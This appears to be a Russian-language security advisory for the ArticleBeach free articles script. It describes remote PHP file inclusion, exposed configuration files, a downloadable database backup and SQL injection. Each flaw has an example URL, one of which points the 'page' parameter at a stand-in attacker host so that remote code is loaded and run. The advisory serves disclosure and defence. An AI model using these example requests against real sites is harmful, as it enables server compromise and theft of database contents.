Программа: ArticleBeach free articles
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к
важным данным, произвести SQL-инъекцию и выполнить произвольный PHP код на
системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре “page” сценария “index.php”. Удаленный пользователь может с помощью
специально сформированного URL выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Пример:
http://victim/index.php?page=http://attacker_site/
2. Удаленный пользователь может просмотреть произвольные конфигурационныt файлы
в каталоге “/includes”.
Пример:
http://victim/includes/config.inc
3. Программное обеспечение хранит резервные копии базы данных в каталоге “ /backup”
в пределах корневой директории Web сервера. Удаленный пользователь может скачать
резервную копию базы данных.
Пример:
http://victim/backup/article_art_22122005.sql
4. Уязвимость существует из-за недостаточной обработки входных данных в
параметре “category_id” сценария “index.php”. Удаленный пользователь может с
помощью специально сформированного URL выполнить произвольные SQL команды в базе
данных приложения.
Пример:
http://victim/index.php?pg=3&page=category&category_id=[SQL]
